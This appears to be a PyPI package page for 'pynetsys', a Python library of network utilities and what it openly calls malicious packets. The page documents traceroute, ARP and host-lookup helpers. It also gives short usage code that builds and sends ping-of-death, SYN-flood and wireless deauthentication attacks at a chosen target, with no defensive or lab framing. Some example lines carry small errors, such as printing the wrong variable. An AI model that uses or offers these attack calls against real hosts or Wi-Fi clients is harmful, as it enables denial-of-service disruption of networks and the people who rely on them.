pynetsys is a collection of tools and malicious packets.
Project description
PYNETSYS
pynetsys is a collection of tools and malicious packets.
Developed by Andrea Vaccaro from ANDRVV (c) 2022
Installing
Linux, MacOS = pip3 install pynetsys --user
Windows = pip install pynetsys --user
Tools
import pynetsys
trace = pynetsys.tool.traceroute("python.org") --> list
print(trace)
arping = pynetsys.tool.arp() --> dict
print(arping)
hostinfo = pynetsys.tool.hostlookup("python.org") --> dict
print(hostinfo)
networks = pynetsys.tool.networkFinder() --> dict
print(hostinfo)
----------------
isonline = pynetsys.isOnline("python.org") --> bool
print(isonline)
haswebprotocol = pynetsys.hasWebProtocol("http:\\python.org") --> bool
OR
haswebprotocol = pynetsys.hasWebProtocol("python.org") --> bool
print(haswebprotocol)
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("https:\\python.org") --> bool
OR
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("python.org") --> bool
print(hasSSLwebprotocol)
addwebprotocol = pynetsys.addWebProtocol("python.org") --> str
print(addwebprotocol)
removewebprotocol = pynetsys.removeWebProtocol("https:\\python.org") --> str
OR
removewebprotocol = pynetsys.removeWebProtocol("http:\\python.org") --> str
print(removewebprotocol)
Create malicious packet and send
import pynetsys
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.DEATH_PING)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.SYN_FLOOD)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "aa:bb:cc:dd:ee:ff", attack = Packets.WIRELESS_DEAUTH)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pynetsys-0.1.5.tar.gz
(10.2 kB
view details)
Built Distribution
pynetsys-0.1.5-py3-none-any.whl
(10.2 kB
view details)
File details
Details for the file pynetsys-0.1.5.tar.gz
.
File metadata
- Download URL: pynetsys-0.1.5.tar.gz
- Upload date:
- Size: 10.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.7
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 4a36b53e56177a2fdf540436d71b64df148c7b8ccc3891d7ab72cfa2e5c6bf79 |
|
MD5 | 8f87854524c6a56cf24a02660d9eb9c5 |
|
BLAKE2b-256 | be9bc88bc5d509a2b5fa8c0e7718abae17a3a431318db75b7fd194e9ed33dde1 |
File details
Details for the file pynetsys-0.1.5-py3-none-any.whl
.
File metadata
- Download URL: pynetsys-0.1.5-py3-none-any.whl
- Upload date:
- Size: 10.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.7
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 95bc10decb4df5fd2a9ca2bdc46099584cee92e27ba722404e52618eb2d8755a |
|
MD5 | 45968e7c8fbc2d1faffc48420ae36090 |
|
BLAKE2b-256 | 95dd167468b87e05a4c1bc420c1695420f8a7114069c7ebafbaf076b43752bfd |